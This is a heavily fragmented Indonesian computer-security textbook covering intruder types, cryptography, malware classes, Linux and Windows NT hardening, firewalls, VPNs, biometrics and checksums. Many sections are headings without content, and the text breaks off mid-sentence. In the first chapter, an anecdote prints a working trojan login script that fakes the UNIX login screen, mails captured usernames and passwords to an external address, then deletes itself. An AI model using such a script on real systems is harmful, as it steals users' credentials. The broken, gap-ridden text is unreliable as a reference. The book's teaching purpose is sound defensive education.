1.1. Pendahuluan
Tujuan :
Keamanan Komputer 1
Menurut David Icove [John D. Howard, “An Analysis Of Security
Incidents On The Internet 1989 - 1995,” PhD thesis, Engineering and
Public Policy, Carnegie Mellon University, 1997.] berdasarkan lubang
keamanan, keamanan dapat diklasifikasikan menjadi empat, yaitu:
2 Keamanan Komputer
3. The High-Profile Intruder (Si Profil Tinggi) - tipe
penyusup ini berusaha menggunakan sistem anda untuk
memperoleh popularitas dan ketenaran. Dia mungkin
menggunakan sistem profil tinggi anda untuk
mengiklankan kemampuannya.
4. The Competition (Si Pesaing) - tipe penyusup ini tertarik
pada data yang anda miliki dalam sistem anda. Ia mungkin
seseorang yang beranggapan bahwa anda memiliki
sesuatu yang dapat menguntungkannya secara keuangan
atau sebaliknya.
1. Mundane;
Tahu mengenai hacking tapi tidak mengetahui metode dan
prosesnya.
2. Lamer (script kiddies);
Mencoba script2 yang pernah di buat oleh aktivis hacking,
tapi tidak paham bagaimana cara membuatnya.
3. Wannabe;
Paham sedikit metode hacking, dan sudah mulai berhasil
menerobos sehingga berfalsafah; HACK IS MY
RELIGION.
4. Larva (newbie);
Hacker pemula, teknik hacking mulai dikuasai dengan
baik, sering bereksperimen.
5. Hacker ;
Aktivitas hacking sebagai profesi.
6. Wizard ;
Hacker yang membuat komunitas pembelajaran di antara
mereka.
7. Guru ;
Master of the master hacker, lebih mengarah ke
penciptaan tools-tools yang powerfull yang salah satunya
dapat menunjang aktivitas hacking, namun lebih jadi tools
pemrograman system yang umum.
Keamanan Komputer 3
1.4. Aspek Keamanan Komputer :
1.4.2. Integrity
4 Keamanan Komputer
1.4.3. Authentication
1.4.4. Availability
Keamanan Komputer 5
1.4.6. Non-repudiation
"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya
perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil
duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
8 Keamanan Komputer
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut
menggunakan program kecil my_login dalam bentuk shell script yang
menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan
sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail
gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Login:
Password:
Keamanan Komputer 9
bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda
dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan
meminta pemakai untuk login ke dalam sistem. Setelah diisi password
dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
rm $0
kill –9 $PPID
1. Lapisan Fisik :
2. Keamanan lokal
3. Keamanan Root
Keamanan Komputer 11
coba dulu: "ls foo*.bak" dan pastikan anda ingin menghapus file -
file yang anda pikirkan.
• Beberapa orang merasa terbantu ketika melakukan "touch /-i"
pada sistem mereka. Hal ini akan membuat perintah-perintah
seperti : "rm -fr *" menanyakan apakah anda benar-benar ingin
menghapus seluruh file. (Shell anda menguraikan "-i" dulu, dan
memberlakukannya sebagai option -i ke rm).
• Hanya menjadi root ketika melakukan tugas tunggal tertentu. Jika
anda berusaha mengetahui bagaimana melakukan sesuatu,
kembali ke shell pemakai normal hingga anda yakin apa yang
perlu dilakukan oleh root.
• Jalur perintah untuk pemakai root sangat penting. Jalur perintah,
atau variabel lingkungan PATH mendefinisikan lokal yang dicari
shell untuk program. Cobalah dan batasi jalur perintah bagi
pemakai root sedapat mungkin, dan jangan pernah menggunakan
'.', yang berarti 'direktori saat ini', dalam pernyataan PATH anda.
Sebagai tambahan, jangan pernah menaruh direktori yang dapat
ditulis pada jalur pencarian anda, karena hal ini memungkinkan
penyerang memodifikasi atau menaruh file biner dalam jalur
pencarian anda, yang memungkinkan mereka menjadi root ketika
anda menjalankan perintah tersebut.
• Jangan pernah menggunakan seperangkat utilitas rlogin/rsh/rexec
(disebut utilitas r) sebagai root. Mereka menjadi sasaran banyak
serangan, dan sangat berbahaya bila dijalankan sebagai root.
Jangan membuat file .rhosts untuk root.
• File /etc/securetty berisikan daftar terminal-terminal tempat root
dapat login. Secara baku (pada RedHat Linux) diset hanya pada
konsol virtual lokal (vty). Berhati-hatilah saat menambahkan yang
lain ke file ini. Anda seharusnya login dari jarak jauh sebagai
pemakai biasa dan kemudian 'su' jika anda butuh (mudah -
mudahan melalui ssh atau saluran terenkripsi lain), sehingga tidak
perlu untuk login secara langsung sebagai root.
• Selalu perlahan dan berhati-hati ketika menjadi root. Tindakan
anda dapat mempengaruhi banyak hal. Pikir sebelum anda
mengetik!
6. Keamanan Kernel
7. Keamanan Jaringan
Keamanan Komputer 13
BAB 2
KRIPTOGRAFI
2.1 Definisi Kriptografi
Tujuan
1. Memahami Apa yang dimaksud dengan kriptografi
2. Mengetahui dan Memahami teknik dasar kriptografi
3. Mengetahui dan Memahami Elemen, Karakteristik kriptografi
Gambar 2.1
2.3 Cryptosystem
A. Symmetric Cryptosystem
Dalam symmetric cryptosystem ini, kunci yang digunakan untuk
proses enkripsi dan dekripsi pada prinsipnya identik, tetapi satu
buah kunci dapat pula diturunkan dari kunci yang lainnya. Kunci-
kunci ini harus dirahasiakan. Oleh karena itulah sistem ini sering
disebut sebagai secret-key ciphersystem. Jumlah kunci yang
dibutuhkan umumnya adalah :
n C2 = n . (n-1)
--------
2
dengan n menyatakan banyaknya pengguna.
Contoh dari sistem ini adalah Data Encryption Standard (DES),
Blowfish, IDEA.
Keamanan Komputer 15
B. Assymmetric Cryptosystem
Dalam assymmetric cryptosystem ini digunakan dua buah kunci.
Satu kunci yang disebut kunci publik (public key) dapat
dipublikasikan, sedang kunci yang lain yang disebut kunci privat
(private key) harus dirahasiakan. Proses menggunakan sistem ini
dapat diterangkan secara sederhana sebagai berikut : bila A ingin
mengirimkan pesan kepada B, A dapat menyandikan pesannya
dengan menggunakan kunci publik B, dan bila B ingin membaca
surat tersebut, ia perlu mendekripsikan surat itu dengan kunci
privatnya. Dengan demikian kedua belah pihak dapat menjamin
asal surat serta keaslian surat tersebut, karena adanya mekanisme
ini. Contoh sistem ini antara lain RSA Scheme dan Merkle-
Hellman Scheme.
16 Keamanan Komputer
• Adaptive-chosen-plaintext attack. Penyerangan tipe ini
merupakan suatu kasus khusus chosen-plaintext attack.
Cryptanalyst tidak hanya dapat memilih plaintext yang dienkripsi,
ia pun memiliki kemampuan untuk memodifikasi pilihan
berdasarkan hasil enkripsi sebelumnya. Dalam chosen -plaintext
attack, cryptanalyst mungkin hanya dapat memiliki plaintext
dalam suatu blok besar untuk dienkripsi; dalam adaptive-chosen-
plaintext attack ini ia dapat memilih blok plaintext yang lebih
kecil dan kemudian memilih yang lain berdasarkan hasil yang
pertama, proses ini dapat dilakukannya terus menerus hingga ia
dapat memperoleh seluruh informasi.
• Chosen-ciphertext attack. Pada tipe ini, cryptanalyst dapat
memilih ciphertext yang berbeda untuk didekripsi dan memiliki
akses atas plaintext yang didekripsi.
• Chosen-key attack. Cryptanalyst pada tipe penyerangan ini
memiliki pengetahuan tentang hubungan antara kunci-kunci yang
berbeda.
• Rubber-hose cryptanalysis. Pada tipe penyerangan ini,
cryptanalyst mengancam, memeras, atau bahkan memaksa
seseorang hingga mereka memberikan kuncinya.
1. Metode Kuno
a. 475 S.M.
Bangsa Sparta, suatu bangsa militer pada jaman Yunani
kuno, menggunakan teknik kriptografi yang disebut
scytale, untuk kepentingan perang. Scytale terbuat dari
tongkat dengan papyrus yang mengelilinginya secara
spiral. Kunci dari scytale adalah diameter tongkat yang
digunakan oleh pengirim harus sama dengan diameter
tongkat yang dimiliki oleh penerima pesan, sehingga
pesan yang disembunyikan dalam papyrus dapat dibaca
dan dimengerti oleh penerima.
Gambar 2.2
18 Keamanan Komputer
b. Julius Caesar,
Seorang kaisar terkenal Romawi yang menaklukkan
banyak bangsa di Eropa dan Timur Tengah juga
menggunakan suatu teknik kriptografi yang sekarang
disebut Caesar cipher untuk berkorespondensi sekitar
tahun 60 S.M. Teknik yang digunakan oleh Sang Caesar
adalah mensubstitusikan alfabet secara beraturan, yaitu
oleh alfabet ketiga yang mengikutinya, misalnya, alf abet
‘’A" digantikan oleh "D", "B" oleh "E", dan seterusnya.
Sebagai contoh, suatu pesan berikut :
a. Substitusi
Keamanan Komputer 19
A-B-C-D-E-F-G-H-I-J-K-L-M-N-O-P-Q-R-S-T-U-V-W-X-Y-Z-1-2-3-4-5-6-7-8-9-0-.-,
B-F-1-K-Q-G-A-T-P-J-6-H-Y-D-2-X-5-M-V-7-C-8-4-I-9-N-R-E-U-3-L-S-W-,-.-O-Z-0
b. Blocking
20 Keamanan Komputer
ditulis secara horizontal dan ciphertextnya adalah hasil
pembacaan secara vertikal.
c. Permutasi
Keamanan Komputer 21
Gambar 2.6. Proses Enkripsi dengan Permutasi
d. Ekspansi
22 Keamanan Komputer
Ciphertextnya adalah "5AN EKNIKTAN ASARDAN
RIPTOGRAFIKAN". Aturan ekspansi dapat dibuat lebih
kompleks. Terkadang teknik ekspansi digabungkan
dengan teknik lainnya, karena teknik ini bila berdiri
sendiri terlalu mudah untuk dipecahkan.
e. Pemampatan (Compaction)
Keamanan Komputer 23
Dengan menggunakan kelima teknik dasar kriptografi diatas,
dapat diciptakan kombinasi teknik kriptografi yang amat banyak, dengan
faktor yang membatasi semata-mata hanyalah kreativitas dan imajinasi
kita. Walaupun sekilas terlihat sederhana, kombinasi teknik dasar
kriptografi dapat menghasilkan teknik kriptografi turunan yang cukup
kompleks, dan beberapa teknik dasar kriptografi masih digunakan dalam
teknik kriptografi modern.
4. IP Security (IPSec)
• enkripsi public/private key
• dirancang oleh CISCO System
• menggunakan DES 40-bit dan authentication
• built-in pada produk CISCO
• solusi tepat untuk Virtual Private Network (VPN) dan
Remote Network Access
5. Kerberos
• solusi untuk user authentication
• dapat menangani multiple platform/system
24 Keamanan Komputer
• free charge (open source)
• IBM menyediakan versi komersial : Global Sign On
(GSO)
8. RSA Encryption
• dirancang oleh Rivest, Shamir, Adleman tahun 1977
• standar de facto dalam enkripsi public/private key
• didukung oleh Microsoft, apple, novell, sun, lotus
• mendukung proses authentication
• multi platform
10. MD5
• dirancang oleh Prof. Robert Rivest (RSA, MIT) tahun
1991
• menghasilkan 128-bit digest.
• cepat tapi kurang aman
Keamanan Komputer 25
11. Secure Shell (SSH)
• digunakan untuk client side authentication antara 2 sistem
• mendukung UNIX, windows, OS/2
• melindungi telnet dan ftp (file transfer protocol)
a. Jasa telekomunikasi
• Enkripsi untuk mengamankan informasi konfidensial baik
berupa suara, data, maupun gambar yang akan dikirimkan ke
lawan bicaranya.
• Enkripsi pada transfer data untuk keperluan manajemen
jaringan dan transfer on-line data billing.
• Enkripsi untuk menjaga copyright dari informasi yang
diberikan.
26 Keamanan Komputer
b. Militer dan pemerintahan
• Enkripsi diantaranya digunakan dalam pengiriman pesan.
• Menyimpan data-data rahasia militer dan kenegaraan dalam
media penyimpanannya selalu dalam keaadan terenkripsi.
c. Data Perbankan
• Informasi transfer uang antar bank harus selalu dalam
keadaan terenkripsi
f. Kartu Plastik
• Enkripsi pada SIM Card, kartu telepon umum, kartu
langganan TV kabel, kartu kontrol akses ruangan dan
komputer, kartu kredit, kartu ATM, kartu pemeriksaan medis,
dll
• Enkripsi teknologi penyimpanan data secara magnetic, optik,
maupun chip.
Keamanan Komputer 27
BAB 3
KEAMANAN DARI MALICIOUS PROGRAM
3.1 Taksonomi ancaman perangkat lunak / klasifikasi program jahat
(malicious program):
Tujuan
1. Memahami klasifikasi malicious program (program jahat)
2. Mengetahui dan Memahami tipe-tipe malicious program
3. Mengetahui dan Memahami Anti Virus
28 Keamanan Komputer
atau tanggal, atau pemakai menjalankan aplikasi tertentu.
Begitu terpicu, bomb mengubah atau menghapus data atau
seluruh file, menyebabkan mesin terhenti, atau mengerjakan
perusakan lain.
Keamanan Komputer 29
sistem dipakai bersama, pemakai dapat menciptakan program
trojan horse.
• Trojan horse ini ketika program dieksekusi akan mengubah
ijin-ijin file sehinga file-file dapat dibaca oleh sembarang
pemakai. Pencipta program dapat menyebarkan ke pemakai -
pemakai dengan menempatkan program di direktori bersama
dan menamai programnya sedemikian rupa sehingga disangka
sebagai program utilitas yang berguna.
• Program trojan horse yang sulit dideteksi adalah kompilator
yang dimodifikasi sehingga menyisipkan kode tambahan ke
program-program tertentu begitu dikompilasi, seperti program
login. Kode menciptakan trapdoor pada program login yang
mengijinkan pencipta log ke sistem menggunakan password
khusus. Trojan horse jenis ini tak pernah dapat ditemukan jika
hanya membaca program sumber. Motivasi lain dari trojan
horse adalah penghancuran data. Program muncul sebagai
melakukan fungsi-fungsi berguna (seperti kalkulator), tapi
juga secara diam-diam menghapus file-file pemakai.
• Trojan horse biasa ditempelkan pada program-program atau
rutin-rutin yang diambil dari BBS, internet, dan sebagainya.
30 Keamanan Komputer
• Masalah yang ditimbulkan virus adalah virus sering merusak
sistem komputer seperti menghapus file, partisi disk, atau
mengacaukan program.
• Siklus hidup Virus melalui empat fase (tahap), yaitu :
Fase tidur (dormant phase). Virus dalam keadaan
menganggur. Virus akan tiba-tiba aktif oleh suatu
kejadian seperti tibanya tanggal tertentu, kehadiran
program atau file tertentu, atau kapasitas disk yang
melewati batas. Tidak semua virus mempunyai tahap
ini.
Fase propagasi (propagation phase). Virus menempatkan
kopian dirinya ke program lain atau daerah sistem
tertentu di disk. Program yang terinfeksi virus akan
mempunyai kloning virus. Kloning virus itu dapat
kembali memasuki fase propagasi.
Fase pemicuan (triggering phase). Virus diaktifkan
untuk melakukan fungsi tertentu. Seperti pada fase tidur,
fase pemicuan dapat disebabkan beragam kejadian
sistem termasuk penghitungan jumlah kopian dirinya.
Fase eksekusi (execution phase). Virus menjalankan
fungsinya, fungsinya mungkin sepele seperti sekedar
menampilkan pesan dilayar atau merusak seperti
merusak program dan file-file data, dan sebagainya.
Kebanyakan virus melakukan kerjanya untuk suatu
sistem operasi tertentu, lebih spesifik lagi pada platform
perangkat keras tertentu. Virus-virus dirancang
memanfaatkan rincian-rincian dan kelemahan-
kelemahan sistem tertentu.
Keamanan Komputer 31
c. Boot sector virus. Virus menginfeksi master boot record
atau boot record dan menyebar saat sistem diboot dari disk
yang berisi virus.
d. Stealth virus. Virus yang bentuknya telah dirancang agar
dapat menyembunyikan diri dari deteksi perangkat lunak
antivirus.
e. Polymorphic virus. Virus bermutasi setiap kali melakukan
infeksi. Deteksi dengan penandaan virus tersebut tidak
dimungkinkan. Penulis virus dapat melengkapi dengan
alat-alat bantu penciptaan virus baru (virus creation
toolkit, yaitu rutin-rutin untuk menciptakan virus-virus
baru). Dengan alat bantu ini penciptaan virus baru dapat
dilakukan dengan cepat. Virus-virus yang diciptakan
dengan alat bantu biasanya kurang canggih dibanding
virus-virus yang dirancang dari awal.
32 Keamanan Komputer
fungsi lain yang dilakukan di sistem itu, worm terus menyebar
dengan cara yang sama.
• Network worm mempunyai ciri-ciri yang sama dengan virus
komputer, yaitu mempunyai fase-fase sama, yaitu : Dormant
phase, Propagation phase, Trigerring phase, Execution phase.
• Network worm juga berusaha menentukan apakah sistem
sebelumnya telah diinfeksi sebelum mengirim kopian dirinya
ke sistem itu.
3.3 Antivirus
Keamanan Komputer 35
BAB 4
KEAMANAN SISTEM OPERASI
4.1. Pengertian Sistem Operasi
36 Keamanan Komputer
Tujuan
1. Memahami Sistem Operasi beserta Keamanannya
2. Mengetahui dan Memahami Keamanan Sistem Operasi Linux
3. Mengetahui dan Memahami Keamanan Sistem Operasi Windows
4.2 Linux
Keuntungan :
• Kekuasaan dalam satu account yaitu root, sehingga mudah dalam
administrasi system.
• Kecerobohan salah satu user tidak berpengaruh kepada system
secara keseluruhan.
• Masing-masing user memiliki privacy yang ketat
Macam User :
• Root : kontrol system file, user, sumber daya (devices) dan
akses jaringan
• User : account dengan kekuasaan yang diatur oleh root dalam
melakukan aktifitas dalam system.
• Group : kumpulan user yang memiliki hak sharing yang sejenis
terhadap suatu devices tertentu.
Keamanan Komputer 37
Virus tidak akan mencapai file system, jika sebuah user
terkena, maka akan berpengaruh pada file-file yang
dimiliki oleh user yang mengeksekusi file tersebut.
Jika kita lakukan list secara detail menggunakan $ls –l, kita dapat melihat
penerapan DAC pada file system linux :
Keterangan :
1 = tipe dari file ; tanda dash ( - ) berarti 5= Jumlah link file
file biasa, d berarti directory, l berarti 6= Nama pemilik (owner)
file link, dsb 7= Nama Group
2 = Izin akses untuk owner (pemilik), 8= Besar file dalam byte
r=read/baca, w=write/tulis, 9= Bulan dan tanggal update terakhir
x=execute/eksekusi 10 = Waktu update terakhir
3 = Izin akses untuk group 11 = Nama file/device
4 = Izin akses untuk other (user lain yang
berada di luar group yang didefinisikan
sebelumnya)
38 Keamanan Komputer
digit ke-1 → 7=4+2+1=izin akses r,w,x penuh untuk user.
digit ke-2 → 4=4+0+0=izin akses r untuk group
digit ke-3 → 0=0+0+0=tanpa izin akses untuk other user.
username : fade
Password :x
User ID (UID) : 1000
Group ID (GUID) : 103
Keterangan tambahan :-
Home directory : /home/fade
Shell default : /bin/bash
Keamanan Komputer 39
password dalam ancaman bruto force attack. Dan perlu pula ditambah
dengan program Bantu cek keamanan password seperti :
1. Passwd+ : meningkatkan loging dan mengingatkan user jika
mengisi password yang mudah ditebak,
ftp://ftp.dartmouth.edu/pub/security
2. Anlpasswd : dapat membuat aturan standar pengisian
password seperti batas minimum, gabungan huruf besar dengan
huruf kecil, gabungan angka dan huruf dsb,
ftp://coast.rs.purdue.edu/pub/tools/unix/
Firewall linux:
Alat pengontrolan akses antar jaringan yang membuat linux dapat
memilih host yang berhak / tidak berhak mengaksesnya.
40 Keamanan Komputer
shell stream tcp nowait root /usr/sbin/rshd
pop3 stream tcp nowait root /usr/sbin/pop3d
…
5. Enkripsi (encryption)
Keamanan Komputer 41
Konfigurasi dilakukan di :
• /etc/sshd_config (file konfigurasi server)
• /etc/ssh_config (file konfigurasi client)
2. Secure socket Layer (SSL) → mengenkripsi data yang
dikirimkan lewat port http.
Konfigurasi dilakukan di : web server APACHE dengan ditambah
PATCH SSL.
6. Logging
Def : Prosedur dari Sistem Operasi atau aplikasi merekam setiap kejadian
dan menyimpan rekaman tersebut untuk dapat dianalisa.
42 Keamanan Komputer
Tipe dasar IDS :
• Ruled based system : mencatat lalu lintas data jika sesuai dengan
database dari tanda penyusupan yang telah dikenal, maka langsung
dikategorikan penyusupan. Pendekatan Ruled based system :
o Preemptory (pencegahan) ; IDS akan memperhatikan semua
lalu lintas jaringan, dan langsung bertindak jika dicurigai ada
penyusupan.
o Reactionary (reaksi) ; IDS hanya mengamati file log saja.
• Adaptive system : penerapan expert system dalam mengamati lalu
lintas jaringan.
Program IDS :
• Chkwtmp : program pengecekan terhadap entry kosong
• Tcplogd : program pendeteksi stealth scan (scanning yang
dilakukan tanpa membuat sesi tcp)
• Host entry : program pendeteksi login anomaly (perilaku aneh)
→ bizarre behaviour (perilaku aneh), time anomalies (anomaly
waktu), local anomaly.
4.3 Windows NT
Keamanan Komputer 43
Hak User / Grup :
• Hak basic : acces computer from network, back-up files/directory,
change system time, logon locally, manage auditing and security, log
(event viewer), restore files and directory, shutdown system, take
ownership files or other object, dll.
• Hak advance : access service and kernel untuk kebutuhan
pengembangan system.
A. NTFS :
• Cepat dalam operasi standar file (read – write – search)
• Terdapat system file recovery, access control dan permission.
• Memandang obyek sebagai kumpulan atribut, termasuk permission
access.
44 Keamanan Komputer
Cluster remapping : Jika ada kegagalan dalam transaksi I/O pada disk ,
secara otomatis akan mencari cluster baru yang tidak rusak, lalu
menandai alamat cluster yang mengandung bad sector tersebut.
Keamanan Komputer 45
• Security Reference Monitor (SRM) : memeriksa status izin user
dalam mengakses, dan hak user untuk memanipulasi obyek serta
membuat pesan-pesan audit.
5. Keamanan Jaringan
1. Memberikan permission :
• Permission NTFS local
• Permission shere
2. Keamanan RAS (Remote Access Server)
Melakukan remote access user menggunakan dial-up :
• Otentikasi user name dan password yang valid dengan
dial-in permission.
• Callback security : pengecekan nomor telepon yang valid.
• Auditing : menggunakan auditing trails untuk melacak
ke/dari siapa, kapan user memiliki akses ke server dan
sumberdaya apa yang diakses.
3. Pengamanan Layanan internet :
• Firewall terbatas pada Internet Information server (IIS).
• Menginstal tambahan proxy seperti Microsoft Proxy
server.
4. Share administrative :memungkin administrator mendapatkan
akses ke server windows NT atau workstation melalui jaringan
7. Keamanan Registry
48 Keamanan Komputer
BAB 5
KEAMANAN JARINGAN
Penggunaan komputer dapat berupa jaringan dengan konfigurasi
tertentu. Hal ini mengakibatkan mekanisme kerjanya juga berbeda
dengan komputer tunggal. Akibatnya untuk keamanan juga memerlukan
penganan yang spesifik.
Tujuan
1. Mengetahui dan Memahami pola kerja jaringan komputer dan
kelemahannya
2. Mengetahui dan Memahami serta dapat merencanakan kebijakan
pengamanan jaringan komputer
Keamanan Komputer 49
• Pembatasan jumlah usaha login.
• Login dibatasi sampai tiga kali dan segera dikunci dan diberitahu
ke administrator.
• Semua login direkam dan sistem operasi melaporkan inf ormasi -
informasi berikut :
➢ Waktu, yaitu waktu pemakai login.
➢ Terminal, yaitu terminal dimana pemakai login.
• Tingkat akses yang diizinkan ( read / write / execute / all )
1. Salting.
Menambahkan string pendek ke string password yang diberikan
pemakai sehingga mencapai panjang password tertentu.
Keamanan Komputer 51
sehingga pemakai mudah mengingatnya dan tak perlu
menuliskan di kertas.
• Pertanyaan berikut dapat dipakai, misalnya :
• Siapa orang tua rudy?
• Apa yang diajarkan Rudy waktu SD ?
• Di jalan apa pertama kali ditemukan si dia ?
• Pada saat login, komputer memilih salah satu dari pertanyaan -
pertanyaan secara acak, menanyakan ke pemakai dan
memeriksa jawaban yang diberikan.
2. S/key (Bellcore)
System software yang membentuk one time password (OTP)
berdasarkan informasi loginterkhir dengan aturan random
tertentu.
52 Keamanan Komputer
authenticator, authenticator menyetujui otentikasi jika
jawabannya sama dengan nilai tadi.
B. Secara Teknis
Keamanan Komputer 53
sesuai dengan kebijaksanaan alur data yang digunakan (security
policy).
• Perimeter network
Suatu network tambahan yang terdapat di antara network yang
dilindungi dengan network eksternal, untuk menyediakan layer
tambahan dari suatu sistem security. Perimeter network juga sering
disebut dengan DMZ (De-Millitarized Zone).
Keuntungan Firewall :
Kelemahan Firewall :
54 Keamanan Komputer
Pilihan klasifikasi desain Firewall :
1. Packet Filtering
Sistem paket filtering atau sering juga disebut dengan screening
router adalah router yang melakukan routing paket antara
internal dan eksternal network secara selektif sesuai dengan
security policy yang digunakan pada network tersebut. Informasi
yang digunakan untuk menyeleksi paket-paket tersebut adalah:
• IP address asal
• IP address tujuan
• Protocol (TCP, UDP, atau ICMP)
• Port TCP atau UDP asal
• Port TCP atau UDP tujuan
Beberapa contoh routing paket selektif yang dilakukan oleh
Screening Router :
• Semua koneksi dari luar sistem yang menuju internal
network diblokade kecuali untuk koneksi SMTP
• Memperbolehkan service email dan FTP, tetapi memblok
service-service berbahaya seperti TFTP, X Window, RPC
dan ‘r’ service (rlogin, rsh, rcp, dan lain-lain).
Selain memiliki keuntungan tertentu di antaranya aplikasi
screening router ini dapat bersifat transparan dan
implementasinya relatif lebih murah dibandingkan metode
firewall yang lain, sistem paket filtering ini memiliki beberapa
kekurangan yakni : tingkat securitynya masih rendah, masih
memungkinkan adanya IP Spoofing, tidak ada screening pada
layer-layer di atas network layer.
Keamanan Komputer 55
Sistem Proxy ini efektif hanya jika pada konjungsi antara
internal dan eksternal network terdapat mekanisme yang tidak
memperbolehkan kedua network tersebut terlibat dalam
komunikasi langsung.
Keuntungan yang dimiliki oleh sistem proxy ini adalah tingkat
sekuritasnya lebih baik daripada screening router, deteksi paket
yang dilakukan sampai pada layer aplikasi. Sedangkan
kekurangan dari sistem ini adalah perfomansinya lebih rendah
daripada screening router karena terjadi penambahan header
pada paket yang dikirim, aplikasi yang di-support oleh proxy ini
terbatas, serta sistem ini kurang transparan.
Internet
bastion
host
56 Keamanan Komputer
sedangkan pada trafik internal tidak dilakukan pembatasan. Dengan
cara ini setiap client servis pada jaringan internal dapat menggunakan
fasilitas komunikasi standard dengan Internet tanpa harus melalui
proxy.
Internet
router
bastion-host
Arsitektur dengan screened-host
Internet
router router
eksternal internal
bastion-host
jaringan tengah
Keamanan Komputer 57
B.2. Penerapan Virtual Privat Network (VPN)
Defenisi VPN
1. Tunnelling
Sesuai dengan arti tunnel atau lorong, dalam membentuk suatu VPN ini
dibuat suatu tunnel di dalam jaringan publik untuk menghubungkan
antara jaringan yang satu dan jaringan lain dari suatu grup atau
perusahaan.yang ingin membangun VPN tersebut. Seluruh komunikasi
data antarjaringan pribadi akan melalui tunnel ini, sehingga orang atau
user dari jaringan publik yang tidak memiliki izin untuk masuk tidak
akan mampu untuk menyadap, mengacak atau mencuri data yang
melintasi tunnel ini. Ada beberapa metode tunelling yang umum dipakai,
di antaranya:
Saat ini beberapa vendor hardware router seperti Cisco, Shiva, Bay
Networks sudah menambahkan kemampuan VPN dengan teknologi
tunnelling pada hardware mereka.
2. Firewall
Keamanan Komputer 59
Kemampuan firewall dalam penerapannya pada VPN
• Secure HTTP
o Produk dari workgroup IETF, diimplementasikan pada
webserver mulai 1995.
o Menentukan mekanisme kriptografi standar untuk
mengenkripsikan pengiriman data http
• Cybercash
o Standarisasi RFC 1898
o Memproses kartu kredit di internet dengan mengenkripsi
dan menandatangani transaksi secara digital.
Keamanan Komputer 61
• IP Encapsulating Security protocol
• Simple-key management for Internet protocol (SKIP)
• Internet security Association and key management protocol
(ISAKMP)
• Internet key management protocol (IKMP)
• Sumber : www.ietf.org
62 Keamanan Komputer
BAB 6
KEAMANAN FISIK DAN BIOMETRICS
6.1 Keamanan Fisik
Definisi:
Tindakan atau cara yang dilakukan untuk mencegah atau menanggulangi
dan menjaga hardware, program, jaringan dan data dari bahaya fisik dan
kejadian yang dapat menyebabkan kehilangan yang besar atau
kehancuran. Keamanan fisik termasuk perlindungan terhadap kebakara n,
bencana alam, pencurian, vandalism dan teroris
Tujuan :
1. Mengetahui dan Memahami Keamanan Fisik untuk Komputer
2. Mengetahui dan Memahami Biometrics
• Bangunan
• Ruang Komputer
• Komputer
• Media Penyimpanan
Dilindungi terhadap :
• Lingkungan
–Kebakaran
–Iklim
–Gempa Bumi dan Getaran
–Air
–Listrik
–Petir
• Orang
Keamanan Komputer 63
• Kebijakan keamanan fisik mulai diperhatikan, dilihat
ulang dan diperbaiki
• Bagaimana menjaga data agar tetap aman jika terjadi
bencana alam
• Bagaimana strategi pemulihan kembali setelah terjadi
bencana
• Bagaimana pengontrolan akses fisik
• Bagaimana standar ruangan server
• Bagaimana penyimpanan data
• Bagaimana prosedur backup
• Bagaimana standar keamanan gedung tempat data center
• Faktor lingkungan
• kebakaran,
• banjir,
• embun,
• suhu,
• listrik,
• gempa bumi dan
• bentuk- bentuk bencana alam lainnya
• Faktor manusia
• Eksploitasi
• Faktor finansial
• Faktor lingkungan
• Bangunan
• Kebakaran
64 Keamanan Komputer
• Suhu/Iklim
• Listrik
• Bencana alam
• Air
• Petir
66 Keamanan Komputer
• Faktor lingkungan –Air
• Banjir dapat terjadi karena hujan, air dari kamar mandi meluap,
dari sprinklers. Pastikan terhindar dari semuanya itu
• Bila komputer terlanjur basah, keringkan dahulu sebelum
dinyalakan
• Gunakan sensor air di lantai dekat komputer.
• Faktor Manusia
6.2 Biometrics
Dapat berupa:
• Sidik jari,
• Telapak tangan,
• Pola retina,
• Pola suara,
• Tanda tangan dan
• Pola mengetik.
• SIDIK JARI
Keamanan Komputer 67
• Kelemahan: luka bakar dan luka fisik pada jari
• debu, keringat, minyak dan lem pada jari bisa
mempengaruhi
• TELAPAK TANGAN
• POLA RETINA
• POLA SUARA
• POLA TANDATANGAN
68 Keamanan Komputer
• POLA KETIKAN
Keamanan Komputer 69
BAB 7
ERROR DETECTION
Tujuan :
1. Mengetahui apakah data yang dikirim melalui saluran
telekomunikasi atau data yang disimpan telah mengalami
perubahan atau tidak.
Menambahkan parity bit dari rangkaian bit yang mau dikirim atau
disimpan 10101101 101011011
a. Even Parity
• Parity bit bernilai 1 bila jumlah bit 1 adalah ganjil
• Parity bit bernilai 0 bila jumlah bit 1 adalah genap
10101010 101010100
b. Odd Parity
• Parity bit bernilai 1 bila jumlah bit 1 adalah genap
• Parity bit bernilai 0 bila jumlah bit 1adalah ganjil
10101010 101010101
7.2 CheckSum
Langkah-langkah pencarian
1. Jumlahkan semua byte
2. Hilangkan carry bila ada
3. Cari two’s complement hasil nomer 2 checksum
Contoh:
Diberikan 4 byte: 0x15, 0x7F, 0x86, 0x5C
1. 0x15 + 0x7F + 0x86 + 0x5C = 0x176
2. 0x176 0x76
3. Two’s complement(0x76) = 0x8A.
70 Keamanan Komputer
Checksum = 0X8A
Contoh Checksum
• Checksum-8 8 bit
• Checksum-16 16 bit
• Checksum-24 24 bit
• Checksum-32 32 bit
• Xor8 8 bit
• Algoritma Luhn 4 bit
Dipergunakan pada:
• Universal Product Code (UPC)
• ISBN 10
• ISBN 13
• Bank Account Number
• Credit Card Number
• ISSN
• Identity Card
• dll
ISBN 10
• Angka terakhir dari 10 digit ISBN adalah check digit
ISSN
• Terdiri dari 8 digit dan angka terakhir adalah check digit
• Bila check digit menghasilkan angka 10, maka check digit diganti
dengan X
72 Keamanan Komputer
BAB 8
KEAMANAN BASIS DATA
Tindakan back-up adalah salah satu aspek penting dari operasi system
komputer. Mendapatkan data yang valid, complete, up-to-date, adalah hal
